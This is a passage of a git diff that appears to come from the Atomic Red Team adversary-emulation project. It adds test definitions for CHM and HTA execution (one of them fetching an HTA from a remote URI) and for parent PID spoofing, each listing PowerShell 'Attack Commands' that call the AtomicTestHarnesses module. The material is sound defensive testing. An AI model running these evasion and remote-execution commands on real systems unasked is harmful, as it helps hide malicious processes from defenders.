+ description: Executes a CHM file with a defined script engine, ITS Protocol
+ Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ script_engine:
+ description: Default Script Engine
+ type: string
+ default: JScript
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
+ #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
+ #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM Shortcut Command with ITS and Help Topic
+ auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+ description: Executes a CHM file using the Shortcut Command method with a defined
+ ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
+ #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
+ #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
T1542.002:
technique:
external_references:
@@ -28845,6 +29141,196 @@ defense-evasion:
'
name: powershell
+ - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral
+ Movement
+ auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+ description: Executes an HTA Application using JScript script engine using local
+ UNC path simulating lateral movement.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
+ #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath
+ #{mshta_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - Jscript Engine Simulating Double Click
+ auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+ description: Executes an HTA Application using JScript script engine simulating
+ double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
+ #{script_engine} -SimulateUserDoubleClick'
+ name: powershell
+ - name: Invoke HTML Application - Direct download from URI
+ auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+ description: Executes an HTA Application by directly downloading from remote
+ URI.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ hta_uri:
+ description: URI to HTA
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol
+ Handler
+ auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+ description: Executes an HTA Application with JScript Engine, Rundll32 and Inline
+ Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ rundll32_file_path:
+ description: Location of rundll32.exe
+ type: string
+ default: "$env:windir\\system32\\rundll32.exe"
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
+ #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+ auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+ description: Executes an HTA Application with JScript Engine and Inline Protocol
+ Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
+ #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+ - name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+ auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+ description: Executes an HTA Application with Simulate lateral movement over
+ UNC Path.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: "$env:windir\\system32\\mshta.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath
+ #{mshta_file_path}'
+ name: powershell
T1218.007:
technique:
created: '2020-01-24T14:38:49.266Z'
@@ -29744,6 +30230,134 @@ defense-evasion:
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
+ - name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
+ ''#{command_line}'' -ParentId #{parent_pid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
+ #{test_guid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe
+ process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
+ ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
+ Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
+ -CommandLine ''#{command_line}'''
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe
+ process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: "$Env:windir\\System32\\notepad.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
+ -FilePath #{file_path} -CommandLine ''#{command_line}'''
+ name: powershell
T1550.002:
technique:
external_references:
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index c764764d..4e26c477 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -10,6 +10,14 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
- [Atomic Test #1 - Parent PID Spoofing using PowerShell](#atomic-test-1---parent-pid-spoofing-using-powershell)
+- [Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process](#atomic-test-2---parent-pid-spoofing---spawn-from-current-process)
+
+- [Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process](#atomic-test-3---parent-pid-spoofing---spawn-from-specified-process)
+
+- [Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe](#atomic-test-4---parent-pid-spoofing---spawn-from-svchostexe)
+
+- [Atomic Test #5 - Parent PID Spoofing - Spawn from New Process](#atomic-test-5---parent-pid-spoofing---spawn-from-new-process)
+
@@ -67,4 +75,182 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process
+Spawns a powershell.exe process as a child of the current process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
+| parent_pid | PID of process to spawn from | string | $PID|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process
+Spawns a notepad.exe process as a child of the current process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| parent_pid | PID of process to spawn from | string | $PID|
+| test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe
+Spawnd a process as a child of the first accessible svchost.exe process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process
+Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
+| parent_name | Parent process to spoof from | path | $Env:windir\System32\notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml
index 78af0ff1..f8d817d8 100644
--- a/atomics/T1134.004/T1134.004.yaml
+++ b/atomics/T1134.004/T1134.004.yaml
@@ -51,3 +51,114 @@ atomic_tests:
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
+- name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: $PID
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}"
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: $PID
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}'
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter \"Name = 'svchost.exe' AND CommandLine LIKE '%'\" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+ name: powershell
+
+- name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: -Command Start-Sleep 10
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: $Env:windir\System32\notepad.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: "Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index dd94ab0a..ef702c12 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -10,6 +10,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
- [Atomic Test #2 - Compiled HTML Help Remote Payload](#atomic-test-2---compiled-html-help-remote-payload)
+- [Atomic Test #3 - Invoke CHM with default Shortcut Command Execution](#atomic-test-3---invoke-chm-with-default-shortcut-command-execution)
+
+- [Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler](#atomic-test-4---invoke-chm-with-infotech-storage-protocol-handler)
+
+- [Atomic Test #5 - Invoke CHM Simulate Double click](#atomic-test-5---invoke-chm-simulate-double-click)
+
+- [Atomic Test #6 - Invoke CHM with Script Engine and Help Topic](#atomic-test-6---invoke-chm-with-script-engine-and-help-topic)
+
+- [Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic](#atomic-test-7---invoke-chm-shortcut-command-with-its-and-help-topic)
+
@@ -83,4 +93,229 @@ hh.exe #{remote_chm_file}
+
+
+
+## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution
+Executes a CHM file with the default Shortcut Command method.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| chm_file_path | Default path of CHM | string | Test.chm|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler
+Executes a CHM file with the ITS protocol handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Invoke CHM Simulate Double click
+Executes a CHM file simulating a user double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic
+Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+
+**Supported Platforms:** Windows
+
+
+
